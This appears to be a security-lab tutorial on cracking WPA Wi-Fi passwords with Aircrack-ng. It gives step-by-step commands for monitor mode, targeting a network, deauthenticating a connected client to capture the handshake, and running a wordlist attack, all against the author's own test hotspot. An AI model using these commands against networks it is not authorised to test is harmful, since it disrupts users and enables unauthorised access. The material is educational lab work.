# Aircrack-ng

## Tutorial Video

{% embed url="<https://www.youtube.com/watch?v=zAWcu3NQLME>" %}

## Requirements

* Wifi adapter that supports monitor mode.
* Linux machine or virtual machine.
* Aircrack-ng.
* List of common passwords. <https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt>

Step 1: Installation

```
sudo apt update
sudo apt-get install -y aircrack-ng 
```

Step 2: Check available Wi-Fi cards. And disable any processes that may interfere with monitor mode.

```
ip a
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FGp0aBfDivYkpSegbNITT%2FAircrackLab01.png?alt=media&#x26;token=ea7770a5-9f2f-4849-a492-e85885d549a5" alt=""><figcaption></figcaption></figure>

The internal Wi-Fi card can interfere with the deauth process so we set it to down with this command.&#x20;

```
sudo ifconfig wlan0 down
```

This command will check any processes that my interfere with our Wi-Fi adapter in monitor mode.

```
sudo airmon-ng check
```

This command then kills any of the processes listed from the command above.

```
sudo airmon-ng check kill
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FILhYdKzZzUM7C74QmwZl%2FAircrackLab03.png?alt=media&#x26;token=819510a0-b4d6-42f7-be7b-85e5eb909e95" alt=""><figcaption></figcaption></figure>

Step 3: The next command will set the Wi-Fi adapter into monitor mode.&#x20;

```
sudo airmon-ng start wlan1
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2F4AtriEFTOigrJuWTt9Xm%2FAircrackLab04.png?alt=media&#x26;token=89960b9b-19a0-420f-a232-8e312c547f78" alt=""><figcaption></figcaption></figure>

Step 4: Next we want to grab the hex value of our target network.

```
sudo airodump-ng wlan1mon
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2Fz0B8zwEIwLJ8QrFXwERx%2FAircrackLab05.png?alt=media&#x26;token=1fcbf5da-24fd-4d12-b910-001e172c7a87" alt=""><figcaption></figcaption></figure>

Our hotspot named TestNetwork seems to be operating on channel 6 with the shown mac address.&#x20;

Step 5: Now we only want to listen to devices trying to connect to our target network so we run the following command.

```
sudo airodump-ng -c1 -w capture -d (YOUR TARGET'S HEX VALUE) wlan1mon
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FrNa4iDg7jc9U7SnmCySb%2FAircrackLab06.png?alt=media&#x26;token=199bfcad-b2d3-469c-861d-3c6fbedd1661" alt=""><figcaption></figcaption></figure>

Step 6: Now we can see the network and a device that is currently connected. We want to deauth this device from the network and capture the WPA handshake when it attempts to re-join the network.

```
sudo aireplay-ng --deauth 0 -a (NETWORK HASH) -c (DEVICE HASH) wlan1mon
```

{% hint style="info" %}
The network hash is the first BSSID and the device hash is the second listed station.
{% endhint %}

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2F40Z4Y6JFLjGS271xOw1m%2FAircrackLab07.png?alt=media&#x26;token=7eabadcb-d730-4257-b212-555542c70026" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FxmfO9Vx3w3bYygESv5ka%2FAircrackLab08.png?alt=media&#x26;token=20d76164-62b8-4ff0-bf85-9202b6ffc3b3" alt=""><figcaption></figcaption></figure>

Step 7: Once we have captured the wpa handshake we can turn off monitor mode on our adapter and attempt to crack the password using a list of popular used passwords.

```
sudo airmon-ng stop wlan1mon
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FaYSvQvfMeLPNxt98H9Lm%2FAircrackLab09.png?alt=media&#x26;token=b26187e5-4c2d-4515-9b95-e237d63906b6" alt=""><figcaption></figcaption></figure>

```
sudo aircrack-ng (YOUR CAPTURE FILE) -w (YOUR PASSWORD LIST DIRECTORY) 
```

{% hint style="info" %}
Your capture file will be saved to your device. There may be multiple capture files so use the most recent one created.
{% endhint %}

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FrjZIps8NaH4CJAzjH5Dt%2FAircrackLab10.png?alt=media&#x26;token=67bdbaa3-a2a8-4df6-ace7-0371b9000c21" alt=""><figcaption></figcaption></figure>

Step 8: Congrats!!! 🥳🥳🥳 you have just learned how to use Aircrack-ng to capture and crack a wpa handshake.&#x20;

{% hint style="info" %}
I am not liable for any misuse of this knowledge. This tutorial is for educational purposes only.&#x20;
{% endhint %}